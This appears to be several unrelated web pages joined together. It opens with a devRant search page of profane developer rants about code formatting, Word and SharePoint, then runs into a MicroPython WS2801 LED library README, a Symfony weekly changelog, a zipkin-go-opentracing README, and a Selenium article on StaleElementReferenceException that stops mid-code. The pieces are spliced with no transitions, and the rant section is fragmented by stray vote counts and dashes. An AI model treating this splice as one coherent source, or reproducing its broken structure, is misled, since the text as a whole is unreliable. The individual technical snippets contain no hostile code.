missed something. So I proceed to get my boss to tell the guy who has the issue I'll sign him up to the testing app to find out the cause and hopefully fix the issue, I setup crashlytics send the email and get a call from my boss saying the guy didn't get the email. Well okay is it my problem that we have two emails for the same person where one of them is a typo? No it's the guy who asked and wrote down the email instead of actually forwarding a blank email from him to be absolutely sure, I sent the email to both just to be on the safe side. I swear if he is another idiot who can't open emails on his phone well I can't help him, app works on my phone and the phones at work. I need a phone where it doesn't work so I can get a solution I know works but if I have to deal with these idiots that can't even check an email how the fuck do I do that? Sorry about the formatting just needed to get this off my chest before I start work. Oh and I get asked "so who'll fix the bugs when you're gone" well I can't (in reality I'm not working for free, I'm not traveling 1 1/2 commute time to fix one bug for free, go hire someone you think will love to work for minimum wage and let's see if this guy can do what I did)8 - Who the fuck came up with the idea of using SharePoint? What it even is?! Is it a website, wiki, document repo...? Our version seems to be a broken wiki with no info content, old links, illogical navigation. And somehow word documents are integrated into it. Sometimes you see some weird calendar and timelines (from old projects). You can navigate into a folder, but you cannot get back. There's no ".." button?? You can map it like OneDrive to yourself, but Windows doesn't support any document version control. Where's the check in/out option from explorer menu??? I sure as shit have those for SVN, GIT etc. Is there a new version created everytime I press ctrl-s or only when I close the document? Well, I could open the document in "online" mode. Ok, the formatting goes weird and everything is super slow. But at least I can fuck up someone elses document by accidentaly copy/pasting stuff, deleting lines, hitting my face into keyboard etc. There's automatically new version added! Somehow you can enable the forced check in/out for documents. Obviously only the library admin can do that. And since he's just a program manager, he has no clue what the fuck is version control or document management. So he has this thing on his "things to do" list. For him, document management means sending various spec versions as email attachments. And the developers can figure out together who has the most recent one. How did M$ push shit piece of shit to corporations? They even use this crap for the intranet making it slower than creation of galaxies. Though it's ok, since you cannot find anything from the intranet. It's all just head honchos blogs, seasonal greetings and stock market statuses. Nowhere is seen the downstairs cafeteria menu for the day. Or where to report for broken toilet. You know, stuff that 99% of people would like to see. I complained to M$ about the SharePoint, but apparently there's no problem. You can code it yourself? Yeiii! So, instead of just updating some line in design spec, I have to take a 3 month class and get a MS sertificate, code some class-based-web-shit for 6 months and maybe, maybe then I can make the page/document look normal? I am thinking, that I will just start writing my specs on paper. I will put them on the shelf and if you want to read it, you will check it out manually. And if someone else tries to edit it while you are editing it, you just cover the paper with your hands. There might be a requirement to make the document look more like MS Word, but that's easy to do. Just go to WC with the paper and wipe with it a couple of times - - 1. talked to a dev and found out he never used git 2. saw a guy formatting the code in eclipse line by line, even when eclipse provides automatic formatting.2 - - Code comment rant of the day... fcking excel just cost me over half an hour to fix the fking formatting...1 -.3 - - - - spent 8 months building and customizing a vtiger database for work. tons of fun got it to a point where I have saved a ton of time for all the people that use the program. boss wants to have reports out of it each morning, so I showed him how to run reports and adjust entries. he didn't like the formatting of the report. so I set up the report to export to excel and took another 2 hours building a macro that formats the way he likes and prints the report for him. he used to take a month filling out paper work to get a report, now all he has to do is open a favorite on his web browser, make 3 clicks Then open an excel and type ctrl+r and it's done. he tells me it seems too complicated and is considering going back to the paper method...so frustrating.2 - - In pull requests, I point out every spelling mistake, unnecessary whitespace and formatting issue. It's not really a bad practice, but my teammates don't like it.2 - - I spent a *very* long time trying to work out why my README file wasn't formatting.... It didn't have a .md extension. :/1 - Added our new Terms of service and privacy policy to website today, copy and paste from word doc....15 pages of legalese with formatting. BLergh!!1 - For other just beginning web devs: spending hours fiddling over a bunch of CSS layout/formatting/animation to make a small widget look just right... Then showing someone your 500ms animation and they say "yeah and....???"1 - - - Common Lisp's format function. Because it supports some crazy convenient formatting directives, such as: writing numbers as words, writing numbers as Roman numerals, correctly writing plurals, etc The code in the image will print: one cat two cats three cats ... seven cats3 - - - - DevRant formatting template: I'm not [insert negative trait] but [insert rant contradicting the first statement - - Google: The all mighty bug fixes for Android Studio are now live, see version 3.4 Android Studio: But I still freeze when I need to format xml files tho, but who cares... ** Days later Google: Android Studio 3.4.1 is now live! Smash those bugs! Android Studio: lool I still freeze when formatting an xml file ¯\_(ツ)_/¯1 - 10 - - - Anyone else been lightly formatting rants and comments with **markdown** hoping for it to be implemented? _I know I have_1 - When u send ur code for review and instead of getting comments for logic u put in, u get 10+ comments regarding variable names , extra lines and formatting. LMF7 -.4 - - So apparently the Android and iOS versions of whatsapp interpret formatting marks differently. Turns out the script wasn't in root...4 - - I hate it when book publishers of tech books don't have their own DRM-free formats. I then have to go on Amazon and see that the Kindle version is only 10% cheaper than paper. Then I factor in the fact that they probably fucked up the formatting on the ebook. So, I end up just buying the paper one and my office continues to resemble a mad scientist's library.11 - why do so many programmers have so little regard for grammar/syntax, spelling and formatting when it comes to written communication?? it's not as though you can get away with ignoring their analogues when coding - Welp, just found the first horrifying innacuracy in Silicon Valley... Richard prefers tabs over spaces. That cant possibly be a thing, right? Right!!?9 - For the love of all things sacred, put a damn space between your parentheses and whatever comes before/after them. It is totally not cool to read if(expression){}. No, seriously, I mean that.11 -.6 - People who not just completely skip or ignore PEP8 all together, but write just the most badly, most ridiculously formatted blocks of shit really should be banned from using Python, pending review of a 400 word essay of why PEP8 is gr8 m8. How the fuck are simple formatting concepts completely disregarded? More to the point, why would you want to write badly formatted, squashed together crap? import statements please at the top of the program dude. Why the fuck are you using 3 spaces for indents? Why the are you naming every single variable with a capital letter? Why aren't you using spaces, oh wait, no I see you used some here, but not there, why? It's like you're trying to be as inconsistent as possible. Naming your variables 'a' and 's' and 'bb'? Ok I'll deal with it, at least you probably won't misspell those later on. But! It's 2020. Why are people who clearly don't know a right click, from their left nut, writing shit without at least any linter? "Help me debug this!" Sorry sir but it looks to be written LIKE SHIT. No wonder it doesn't work and furthermore, NO WONDER YOU DON'T UNDERSTAND *WHY* IT DOESN'T! If it was readable, I'm sure you'd have nooooo problem. I want to make a plugin for vscode and and PyCharm that when you paste horribly formatted shit into it, the sound file: are_you_shitting_me.mp3 plays at max volume.15 - Documenting. Starting Microsoft Word to fill in a preconfigured template. It contains two numbered lists, but the numbering incorrectly continues from the first list to the second. Right-click > numbering > Set Numbering Value > Start new list. Bang! MS Word fucks up the complete formatting, margins, tabs, paragraph spacing... But the list numbering still continues from the first list to the second. I SO FUCKING HATE MICROSOFT WORD FOR WINDOWS!!!7 - - - RANT*1000000 Fuck you, Microsoft. It's in the smallest details, like Office, that you just CAN'T install properly on Linux. I tried Wine, Winetricks, PlayOnLinux, went through like 10 different tutorials when I got stuck... Even when I got Office 2013 relatively working (and then couldn't uninstall it later), the formatting got fucked all over the place. And none of the open source replacements do the proper formatting. Even OnlyOffice, that doesn't even have RTL (still!), gets it wrong. And I know, dear Microshit, that you transferred to OOXML and many other word editors support it as well, but it still doesn't work like it should and you STILL refuse to release an Office bundle for Linux. In a world where I'm surrounded by MS users, I can't even view a word document properly, let alone edit it in a normal way. If there's a way Microsoft can keep their clutch on the PC users, it's these small things, and for that - FUCK YOU MICROSOFT.42 - Once had a teammate who added // @formatter:off (eclipse) at the beginning of nearly each class, to make sure my auto-format on save does not ruin his nice formatting as i usually let eclipse take care of this, i commited unformatted code by mistake so he formatted my code by hand1 -?19 -2 - Fought with the Windows Disk Manager for way too long this morning trying to shrink a partition with plenty of space so that I could setup a native dual boot... Screw that tool, I resized the partition to nothing by formatting it - Already using PhpStorm for 2 years now. Just discovered there was an auto-formatting tool for your code. Could have saved me hours of work. Why is life so hard with me2 -?10 - Because, definitely, size shouldn't matter. Code description for the blind: if the size of this query is loved, then close the database and die.8 - Fuck MySQL Workbench! I have spent 2 fucking days diagramming a 350 table database 3 times over because if it doesn't crash and ignore your saves it corrupts its own data and drops the hours of formatting you've done! Now I'm trying to print an ugly un-formatted piece of sh*t because I need to get on a flight to the meeting I need to present this at and it ignores all my default printer settings and wastes 40 A3 sheets of paper. Does Oracle even use the shit they are releasing? For the love of god if you can't maintain it for free fix your fucking bugs and I will buy a license but I cant keep working like this.6 - Fuck this I need to ventilate. Thinking about job change because maintaining and extending 3 years old codebase (flask project) is FUCKIN exhausting. It was badly written since start by someone who obviously didn't know much about python. (Going by commit history.) Examples: - if var != None / if var == None - if var is not None / if var is None (well..) - Returning self-parsed obscure JSONs from dict variable - Serializing dictionaries into database by str() (both sqlalchemy and mysql support JSON format) - THEY ARE ALMOST UNUSABLE OTHER WAY AROUND (luckily, python can deal even with that) - celery tasks, the way they are called they BLOCK the whole flask (not bad in itself, but if connection breaks there are no errors, nothing it just hangs) - obscure generator/yielding that contains return of flask's response in itself - creating fifteen thousands of variables one by one where they would look so nicely as dict keys, and hey they are then both MANUALLY SERIALIZED into returning dict by "%s" (string formatting) [okey, some of them are objecst like datetime but MATE WTF] - many, many more, PEP lint shall not pass I would rather deal with fresh startup owners wanting me to program unicorns in one week then trying to extend and manage zombie-like projects. Nothing personal against the firm I actually like the place?! - - Is there some way to format code on devrant or say, surround a section of text with (at minimum) italics? I mean we *are* on a site dedicated to developers.28 - Did you know that Alt+f4 and Ctrl+w does not format your code in VS code? Yes? Our college didn't and we had a good laugh 😂 After that we tried Alt+space+c but he did not trust us anymore.2 - Never enable Prettier and Beautify at the same time. I wasted many hours on this a few days ago wondering why my formatting is getting fucked every time I save.4 - - - Feature request: Being able to copy text from rants/comments on mobile. Also some sort of code formatting would be nice!2 - - - Why is there always one asshole! New job just a month in, had a meeting where we could bring up improvements and put them on cards. I brought up the idea of using slack so we could collaborate better or maybe a collab space. We all have our own offices or share with high walls. The guy running the meeting has the same title as me said we never had that before, are you unhappy with yiur onboarding? Slack or a messaging app is industry standard for even none tech companies. I was polite and said it was just a suggestion and it might make it easier to get help for the new people if there is a group chat. Also brought up using a formatting standard so code reviews are spent commenting on spacing. I said we could you prettier to implement that and just pick a standard. He said that was an issue because people were not paying attention before they pushed the code. I am sorry I am new so I am rewriting and rewriting code all the time. I was to format on save and not spend time fucking formatting! I could use a package before since it I formatted it would look like a bunch of fucking changes in git. Why make things harder? Part of the meeting was how to get code done and PR’ed faster so it gets to the testers. Autoformatting shit would help - - - LaTeX is all fun and cool and awesome until you encounter a stupid formatting issue that is impossible to fucking fix in a sensible amount of time.1 - - dev: ugh we need to set and implement coding standards same dev: no I don't need to follow what you just said, it's already clean and readable (it's - - - When I only want to code, but university LaTeX bullshit burns my time 😭 they dont even have clear rules. Not to mention that their formatting rules make my work look like shit I would never read myself.5 - - This should put an end to those code formatting rants. Now everyone can be on the same page. - Automatically clean up code, removing redundant and duplicate bits, splitting large functions, and formatting it nicely. Especially useful when trying to understand some garbage code someone else wrote which you need to rewrite.2 - - #include <stdio.h> int main() { printf("Come at me. I give opening curly brackets their own line, use Dvorak and use tabs!") }5 - - Just merged the stuff that the other intern and I have been working on for the past couple weeks together. He didn't comment a single function; not the couple thousand lines of c# functions on the server side, nor the hundreds of lines of JavaScript on the client side. It's a mess of formatting... Ugh.4 - I see several post about linux, that made me remember the worst day of learning about linux installation many years ago. I actually just want to know about linux, then suddenly install it without any knowledge about formatting harddisk and something like that. And the first choice which come up is "install on entire harddisk" i think its like on windows installer and i go through next and next. Then i got my whole data erased after that. At that time i feel regret.wanna burn my linux cd installer. But the thirst for trying new is so high.its like wanna pay for the mistake. After that i like to install many linux distro to choose which one suit my need. I love linux!!3 - Not really a developer thing but... I was bored so I took apart a 360 hard drive to prove to a friend it's not much different from a computer one Just special adapter and formatting1 - A few weeks ago I ordered 2 8TB HDDs so they can run in RAID 1 on my server. Then I discovered that one of them isn't working. So I sent it back to seagate and got a new fresh one today. I thought I would install it in my server and everything will be fine ... First thing was to backup all files on the already working HDD and delete the volume, but windows already put a pagefile on it so I needed to deactivate it. Restarted and notice that windows wasn't doing anything so I deactivated it again and now the wonderful text "Getting Windows ready screen" appeared and after minutes of starring at a non moving image I force-restarted the server and eventually I could delete the volume. I activated mirroring and thought "I'm ready to go". After 15 Minutes of waiting, the text changed from "Formatting" to "Formatting (1%)". The only thing I wanted to do was yelling ... Thanks Windows .... thanks4 - : - Today's achievement, refactoring forms for a better future, Previously, a form "component", consisted of 700+ lines of unreadable mumble jumble 👉🏻👌🏻🐂💩and no room for improvement, it stores values one by one in the reducer, everytime a field changed, a reducer action is triggered, invoking a specific action for 1 specific field, and storing/formatting its values, And they want to it to be able to support dynamic multiple form fields, Suffice to say, I got the short end of the straw (as usual), and refactoring it using a new library was easier than I thought, overall 250+ lines, over 2 files, with all the required functionality, I'm curious of the guys who made it in the first place, -. - - Used to Google all my `man` pages... Don't really know why. Formatting maybe. Then I typed `man date`... I use `man` for my `man` pages now.3 - - - This is the story of probably the least secure CMS ever, at least for the size of it's consumer base. I ran into this many years ago, before I knew anything about how websites work, and the CMS doesn't exist anymore, so I can't really investigate why everything behaved so strangely, but it was strange. This CMS was a kind of blog platform, except only specially authorised users could view it. It also included hosting. I was helping my friend set it up, and it basically involved sending everybody who was authorized a email with a link to create an account. The first thing my friend got complaints about was the strange password system. The website had two password boxes, with a limit of (I think) 5 characters each. So when creating a account we recomended people simply insert the first 5 characters in the first box, and the rest in the second. I can not really think of a good explanation for this system, except maybe a shitty way to make sure password are at least 5 characters? Anyway, since this website was insecure the password was emailed to you after the account was created. This is not yet the WTF part. The CMS forced sidebar with navigation, it also showed the currently logged in users. Except for being unreadable due to a colorful background image, there where many strange behaviors. The sidebar would generally stay even when navigating to external websites. Some internal links would open a second identical sidebar right next to the third. Now, I think that the issue was the main content was in an iframe with the sidebar outside it, but I didn't know about iframe's back then. So far, we had mostly tested on my friends computer, which was logged in as the blog administrator. At some point, we tried testing with a different account. However, the behavior of sidebars was even stranger now. Now internal links that had previously opened a second, identical sidebar opened a sidebar slightly different from the first: One where the administrator was logged in. We expirimented somewhat, and found that by clicking links in the second sidebar, we could, with only the login of a random user, change and edit all the settings of the site. Further investigation revealed these urls had a ending like ?user=administrator2J8KZV98YT where administrator was the my friends username. We weren't sure of the exact meaning of the random digits at the end, maybe a hash of the password? Despite my advice, my friend decided to keep using this CMS. There was also a proper way to do internal links instead of copying the address bar, and he put a warning up not to copy links to on the homepage. Only when the CMS shut down did he finally switch to a system where formatting a link wrong could give anybody admin access. - Do you think my credit card company has a big bounty? String formatting really isn't that difficult.1 - Things that piss me the fuck off about user programs(in this case text editors): No fucking documentation or signs of it available, a promise from like 3 years ago to post: tutorials/actual docs and yet unfulfilled shit. Yet the author sells the editor, you can get a free version of it, but the extension api is only given in the paid version. It's like $12 bucks, which depending on where you are from is really the cost of a meal. The editor in question is 4coder, seems like a good stack for building C/C++ based applications with a lot of cool utilities underneath, I see dudes using it to create a lot of cool shit online, but things like moving input, stopping the thing from formatting pasted code etc etc. Shit, even reaching the documentation is fucky, you get the names of the commands......ok...awesome...wtf do I do with these? Why do i need to watch a 20+ minute tutorial from the developer instead of being able to read a retarded ass tutorial regarding how to do the most basic shit? For an editor that is set to replace Emacs and Vim for developers inside of a windows platform....it sure is lacking AF in that regards. I really want to work with this thing because it seems to be made with a lot of heart, just can't stand the fact that the documentation is lacking like a motherfucker4 - So one thing that kinda bugs me about php embedding is the white space formatting it creates when you break your project into templates or includes. It has no affect on the front end at all but if you look at the source code, usually the top tag in a php template is spaced way off, unless you move your entire php code block all the way to the left. Then somehow it looks right on the frontend but now your php source code looks messy xD Could just be my code editor (ST3) but idk. Anybody else?2 - So I'm having a discussion with frontend devs now and I'm curious how you folks are doing this: suppose you have a rest api at BE and some js framework in FE consuming it. Where do you format display info at: BE or FE? Info like human-readable timestamps [according to user's TZ], i18n, displaynames with appropr. lengths, etc.. Is this a job for FE or BE in your oppinions? [imo it's view's job to be responsible for view-speciffic matters, while BE should provide all required info for FE to do it's formatting et al.]20 - When I code in Qt Creator, and a function get to be more than 950 lines of code, autocomplete/autoformatting stops working. I feel like Qt Creator is judging me...6 - - - Moment.js, because without it, formatting and converting JS Date objects to other timezones is a bitch - - In code reviews they are whining about formatting with spaces and newlines and naming. The fact that they are too bored to write unit tests and code coverage cannot reach 20%? Isn't it just sad?6 - - I spent the week working on an adapter to a specific format, the client came this morning to tell us Json would also have worked. Then why didn't you tell me earlier?!? - You want me to plot this formatting monstrosity in Excell... nope... I need python to fix the data sets anyway.6 - Wasted an hour figuring out why the backed up files and pics from an OTG device cant be seen on my laptop (linux) Fucking OTG file system formatting is exFat. (i know i should get exfat-utils) - Any browser (+plugin) recommendations for viewing JSON and XML? Ideally for Mac OS, but have a Windows 7 VM I can use instead if there's a much better option. Currently I'm copying from Safari and pasting into Notepad++ and formatting with a plugin, but that feels pretty sub-optimal. Suggestions much appreciated.3 - Saw this in the Python project codebase today: arg = '\"foo\"' Which is funny, because '\"foo\"' == '"foo"' - - - So after 10 BSODs and 5 hours of recorvering, formatting and reinstalling we finally managed to reinstall Windows 10 on my friends computer! Yaaaaah! I was so freaking stressed and frustrated but now its all good2 - - Java developers not correctly formatting their code. Like, guys, seriously...your IDEs do that for you and it saves me from having to look at checkstyle complaining for a million lines....1 - Poll time/input requested. Multiple assignments in one statement: yay or nay? For a (painfully) simple example: a = b = true; vs. a = true; b = true;7 - - My boss writes code like this: def someFunction (someArg: String) = ... Who does that?! A space? Da fuck?! And it's all over the code base. Whenever another dev touches any of his stuff, we correct it: def someFunction(someArg: String) = ... The way god intended it!8 - I run auto-formatter with every typo correction so nobody notices. 300 lines changed, message "formatting" - I still don't get it why we don't have code snippet paste ability, like slack or .MD file? Can we have some little formatting please? Pasting screenshots is not always the best.3 -. - Arg, Visual Studio 2015, stop trying to fix my comment indentation! It's a comment and. It is NOT part of the code. Leave my formatting alone!!!3 - ?4 - That feeling when you type out a hilarious response to someone's rant on DevRant, written with meticulous code styling, and then you realise formatting is ignored! -. - Why do I always default to formatting/resetting whenever I have a tech problem... Android bootloop: reset device, lose all datas and reroot. Root cause turned out to be need to uninstall Magisk first. Today: Can't connect Chromecast even after restarting phone and Chromecast. Reset Chromecast completely, configured again fine but then can't connect again. Root cause: router, router just needed to be restarted...2 - If every computer of a relative has been at least once brought to you for formatting and windows setting up, then you're an engineer.1 - I know, it is unprofessional. I know, it is lacking comments and proper formatting. [...] I was going through two old codebases of mine. Here are two code snippets of them. I find the frustruated comments amusing. I guess that counts as self-sadistic behavior lol1 - They are using a interesting code formatting style Star Citizen: Bugsmashers! - Spectator Mode Crash - YouTube - - Use git branch --merged to get, you guessed it, all the branches you have merged. Use git branch -d <branch-name> To delete a branch if it has been merged (use -D for forced) And Use, git branch --merged | egrep - v "(^\*|master|dev)" | xargs git branch - d To delete all the branches that you have merged (but not anything with master/dev in their names) Sorry for the formatting, I don't know how coder formatting works on DR.. - The worst part about programming assignments at my school is formatting the god damn output strings. Fuck2 - Am I the only one who thinks to rewrite whole thing when the code have weird formatting and so complex to understand and annoying bunch of functions which can be just ternary or an if? - So, im getting tired of the clutter on my home computer. Thinking about formatting my SSD and putting a fresh OS install, however, I was having trouble deciding between re-doing Windows 10 or going to linux OS. Thing is, I play vidya games on this computer too, but I want it to mainly be a workstation. What do?6 - !rant Can we bring into discussion inline monospaced code snippets again? Basic markdown text formatting. Like bold, italics, lists. - I wish I could start my web based Brainfuck IDE with single stepping and breakpoints, as well as code formatting. I wrote it as a Java desktop application 2 years ago with no comments and I've never touched it since. - Fuck python Excel libraries. Had to write a spreadsheet formatting/filtering script to automate content generation. Definition of too much work. On the plus side just auto formatted 5000 spreadsheets in seconds.3 - Guess who’s back after a few months. I was so frustrated because of something at work today that I needed to vent. So currently we are working together with a frontend company, we make the api, they do the frontend. I got a few feedback points, one of the things was that they asked if the dates could be formatted in our language. I said no that’s not really recommend because the api should only handle data not translations or date formatting. They responded with that it was because of speed... Date formatting is literally a few fucking milliseconds. Technically it is even slower serverside because the fact that I need to process it in a serverless function which is probably less powerful than the average client machine. Fucking lazy fucks.11 - Teammate used some excel sheet concoction/gimmick to execute hundreds of thousands insert statements on production tables. A few days later (when I'm on call), I find out he didn't adjust the cell formatting on the aforementioned excel "tool", so all the network addresses from the insert statements were put in scientific notation, on prod...thus breaking a lot of the things. FML - - - Every time I decide to reset my working environment I get last minute requests flagged with the highest importance. I swear it's a God damn conspiracy. - - I'm dying when I see a span of code out there in the wild, mixed with everything else. `Can we have some backtick love?` This is a site for developers. Halp! - The moment you pull the latest changes just to find out that your new coworker edited all the js files in xcode1 - How come when posting a rant I can keep coherent paragraphs like so: line 1 line 2 line 3 ...but when I post a comment the same text looks like this: line 1 line 2 line 3 WTF devRant? Be consequent with your formatting.6 - What is everyone's preferred formatting for functions/if statements. Does the first curly brace go on the same line or a new line? function 1() { } or function 2() { - - working on a second PC, (formatting it) and it's not connected to the internet, it's clock is an hour in advance for w/e reason, have been using it's screensaver-clock all day 7pm, time to go home, .. fuck only 6pm, noooooooooo - - I had this teacher who was teaching us how to use java and .NET to parse XML data to an excel sheet. Let's say every week i was spending at least 2 hours finding bugs in the excel formatting and telling it to the teacher. This happened for few weeks and when the project ended I could see how tired of he was. To this day me and my colleague still rant about that - I - Is there a way to stop all these code formatting arguments ince for all? For example, a github /ide plugin reformats your code to your preference when you work on/review but in the end, it is stored in some specific format.7 - I simplified 7 functions down to a blob because it was truly unreadable and fragmented. As I did it, I thought there was no way I did it right. This can't be the logic. Nope. It is. Yeah, the formatting could be better. End of the shift so that's a tomorrow thing.10 -?6 - - Formatting code on stack overflow is a fuckin pain. One thing is off and the website is like WAIT WAIT WAIT WAIT. And then after all that time spending formatting it, to get your question closed for not being specific enough.2 - - I've always was curious why people debating about mostly two code formatting types for(;;) { //somestuff } or for(;;){ //somestuff } while almost no one uses pretty decent IMO type like for(;;){ //somestuff //somemorestuff} (with tabs ofc) It might be easier to forget some }s, but other than that it seems pretty nice to me13 - - - Me: 'here we go, code working completely as intended, tested and without bugs.' Senior after reviewing code: 'apart from the formatting errors, I'd also do this piece of coding in a different manners' Me: 'well this seems more like a change the whole logic request rather than a small improvement, I'll keep it like this and resolve it like suggested on a future opportunity' Still in prod. - - So, I just attempted to use KDE's partitionmanager application on Gentoo... just noticed that every time I run it, it screws up the formatting in /etc/fstab. That's a deal-breaker! Back to gparted... - Was generating a JSON based config manually to be used by a script another dev wrote - only to be criticized for using the text editors built in formatter. Evidently lining up the colon separating key value pairs is a thing. If readability was so important to you why the fuck did you decide on using JSON as a configuration format? Especially when you could have gone with YAML or better yet INI (flat key/value pairs) style config. - - I was once formatting a pendrive and Windows decided to shutdown and killed the pendrive... It ain't mine you know?1 - so we want to use this software for document mangement (versioning and stuff). i totally understand why the developer used rtf for document templates. but it took me freaking 6 hours to create a simple document header while finding out 500 designs and methods that didn't work due to the rtf format corset that differs more from word formatting abilities that i expected. - Found an intresting talk about formatting code, any thoughts of the points he brings up, yay or nay? Top Tags
https://devrant.com/search?term=formatting
CC-MAIN-2020-24
en
refinedweb
MicroPython WS2801MicroPython WS2801 A MicroPython library to interface with strands of WS2801 RGB LEDs. It's based on Adafruit WS2801 library for regular Python. ExamplesExamples Copy the file to your device, using ampy, webrepl or compiling and deploying. eg. $ ampy put ws2801.py Use a 7 pixel strand and set all LED's red from machine import SPI from ws2801 import WS2801Pixels spi = SPI(1) ws = WS2801Pixels(7, spi) ws.set_pixels_rgb(255, 0, 0) ws.show() LinksLinks LicenseLicense Licensed under the MIT License.
https://libraries.io/pypi/micropython-ws2801
CC-MAIN-2020-24
en
refinedweb
A week of symfony #430 (23-29 March 2015) This week, Symfony officially introduced its new installer. In addition, the String security utils were refactored and some nice performance improvements were applied to DomCrawler component and to the PHP container dumper. Lastly, the upcoming Symfony 3 version removed all the *.class container parameters, since they are no longer considered a good practice. Symfony2 development highlights - fa9fb5c: [DomCrawler] replace GET parameters when changed via form parameters - 2cc5011: [DependencyInjection] improve PhpDumper performance for huge containers reusing visited lookup with reference - f24c8ab: [SecurityBundle] removed a duplicated service definition and simplified others - ec4e9d2: [Security] refactored String utils - bdea4ba: [Security] prevent modifying secrets as much as possible - 45cfb44: [Security] changed behavior to mirror hash_equals() returning early if there is a length mismatch - e29f74e: [travis] kill tests when a new commit has been pushed - ccd32d5: Translator component has default domain for null implemented - bd7788a: [DomCrawler] improved namespace discovery performance - 99330cb: [DependencyInjection] prevented inlining service configurators - eda1ab7: [WebProfiler] fixed partial search on URL in list - 39da732: [FrameworkBundle] added support for dynamic configurations in debug:config - ea8da6e: [Security] fixed confused StringUtils::equals() arguments in RememberMe Cookie based implementation - e8b0678: [TwigBridge] improved Bootstrap layout whitespace control - 9944589: [VarDumper] fixed dumping ThrowingCasterException - 89a6b95: [Security] improved entropy of generated salt - 89cbafd: [DependencyInjection] improved YAML syntax support for keys "method" and "arguments" in "calls" statement - 7e94662: [FrameworkBundle] allowed to disable Kernel reboot - e99c09e: [Translation] refresh cache when resources is changed in debug mode - 83c6d22: [VarDumper] added Caster for XML-parser resources - 2462c5b: [VarDumper] with-er interface for Cloner\Data - f5a020e: [Validator] removed the API version in the validator component - 504e338: [DependencyInjection] made it possible to dump inlined services to XML - 1008e6c: [VarDumper] add caster for MongoCursor objects - 51223d2: [WebProfilerBundle] fixed collapsed profiler menu icons - 12c1feb, 70f1f24: [VarDumper] implemented expand all on ALT+click - a5628bd: [FrameworkBundle] display friendly message if the event does not have any registered listeners - ed18767: [Console] added support for table colspan/rowspan + multiple header lines - 9d6596c: [Translation] allowed extracting an array of files besides extracting a directory - d3b8b84: [Form] improved triggering of the setDefaultOptions deprecation error - 8835d1a: removed all *.class parameters Newest issues and pull requests - Towards PHP 7 compatibility - [DX] Provide an easy way to check if a user has a security role - [DX] [Form] Ability to reset form validation errors (or prevent them from rendering) - [Form] filter entity choicelist after hydration - Should the ParameterBag get method be changed? - Symfony2 web profiler return 404 error, js code duplicate in footer - [DomCrawler] phpFiles array is generated wrongly for fields with more than one level - Missing access decision strategy highest not abstained voter - [DX] src/AppBundle versus app Twig development highlights - 8bb7cbb: [1.x] fixed memory leaks in PHP extension - c41d305: [1.x] cleanup API and code of the PHP extension Silex development highlights SwiftMailer development highlights They talked about us - The benefits of decoupling your CMS - New Symfony installer: the fastest way to start your Symfony project - Choosing your framework − Laravel & Symfony - Best PHP Framework for 2015 – SitePoint Survey Results - Introduction to Symfony2: Getting Ready for D8 - Uploading Files using AngularJS and symfony2 - Symfony Components in Legacy Code - Novo Symfony Installer disponível - Symfony Live 2015 : Construire des applications API-centric avec Symfony - Apresentando o novo Instalador do Symfony - Symfony2 - Supprimer le Bundle de démo Acme - Neuer Symfony Installer ersetzt traditionelle Composer-Installation - El nuevo instalador de Symfony - Agregar última fecha de modificación automaticamente en el CRUD de Symfony2 - Symfony2.x to 3.0升级日志 - Symfony Meetup #2を開催しました A week of symfony #430 (23-29 March 2015) symfony.com/blog/a-week-of-symfony-430-23-29-march-2015Tweet this __CERTIFICATION_MESSAGE__ Become a certified developer. Exams are taken online! @Felipe thanks for the reference. However, we seldom link to video contents. We prefer written articles, news, blog posts, tutorials, etc. Why is *.class% considered bad practice? Seemed like an easy way to override default behaviour if you needed it. To ensure that comments stay relevant, they are closed for old posts. Felipe Martins said on Mar 29, 2015 at 20:56 #1
https://symfony.com/blog/a-week-of-symfony-430-23-29-march-2015
CC-MAIN-2020-24
en
refinedweb
github.com/openzipkin-contrib/zipkin-go-opentracing zipkin-go-opentracing OpenTracing bridge for the native Zipkin tracing implementation Zipkin Go. Notes This package is a simple bridge to allow OpenTracing API consumers to use Zipkin as their tracing backend. For details on how to work with spans and traces we suggest looking at the documentation and README from the OpenTracing API. For developers interested in adding Zipkin tracing to their Go services we suggest looking at Go kit which is an excellent toolkit to instrument your distributed system with Zipkin and much more with clean separation of domains like transport, middleware / instrumentation and business logic. Examples Please check the zipkin-go package for information how to set-up the Zipkin Go native tracer. Once set-up you can simple call the Wrap function to create the OpenTracing compatible bridge. import ( "github.com/opentracing/opentracing-go" "github.com/openzipkin/zipkin-go" zipkinhttp "github.com/openzipkin/zipkin-go/reporter/http" zipkinot "github.com/openzipkin-contrib/zipkin-go-opentracing" ) func main() { // bootstrap your app... // zipkin / opentracing specific stuff { // set up a span reporter reporter := zipkinhttp.NewReporter("") defer reporter.Close() // create our local service endpoint endpoint, err := zipkin.NewEndpoint("myService", "myservice.mydomain.com:80") if err != nil { log.Fatalf("unable to create local endpoint: %+v\n", err) } // initialize our tracer nativeTracer, err := zipkin.NewTracer(reporter, zipkin.WithLocalEndpoint(endpoint)) if err != nil { log.Fatalf("unable to create tracer: %+v\n", err) } // use zipkin-go-opentracing to wrap our tracer tracer := zipkinot.Wrap(nativeTracer) // optionally set as Global OpenTracing tracer instance opentracing.SetGlobalTracer(tracer) } // do other bootstrapping stuff... } For more information on zipkin-go-opentracing, please see the documentation at go doc.
https://search.gocenter.io/github.com/openzipkin-contrib/zipkin-go-opentracing
CC-MAIN-2020-24
en
refinedweb
Mystery of StaleElementReferenceException in Selenium WebDriver If you are a Selenium developer than you would have surely faced this mysterious exception called “StaleElementReferenceException“ Why exactly it occurs? This has been my favorite interview question since last many years and most of the time candidates gets confused it with NoSuchElementException. In case you have never worked on a dynamic ajax based application then there could be a chance that you have never faced it. Let’s go little deeper and unveils the mystery behind it. When we run a simple code like this: WebElement searchBox = driver.findElement(By.cssSelector("input[name='q'")); searchBox.sendKeys("Selenium"); When WebDriver executes the above code then it assigns an internal id (refer the below image) to every web element and it refers this id to interact with that element. /> Now, let’s assume when you have fetched the element and before doing any action on it, something got refreshed on your page. It could be the entire page refresh or some internal ajax call which has refreshed a section of the dom where your element falls. In this scenario the internal id which webdriver was using has become stale, so now for every operation on this WebElement, we will get StaleElementReferenceException. To overcome this problem, the only choice we have is to re-fetch the element from Dom and this time WebDriver will assign a different Id to this element. So from the above example what we understood is that if we are working with an AJAX-heavy application where page’s dom can get changed on every interaction then it is wise to fetch the web elements every time when we are operating on them. There are couple of ways to make sure, the element always gets refreshed before we use it: Page Factory Design Pattern: Please refer the below code. GoogleSearchPage page = PageFactory.initElements(driver,GoogleSearchPage.class); public class GoogleSearchPage { @FindBy(how = How.NAME, using = "q") private WebElement 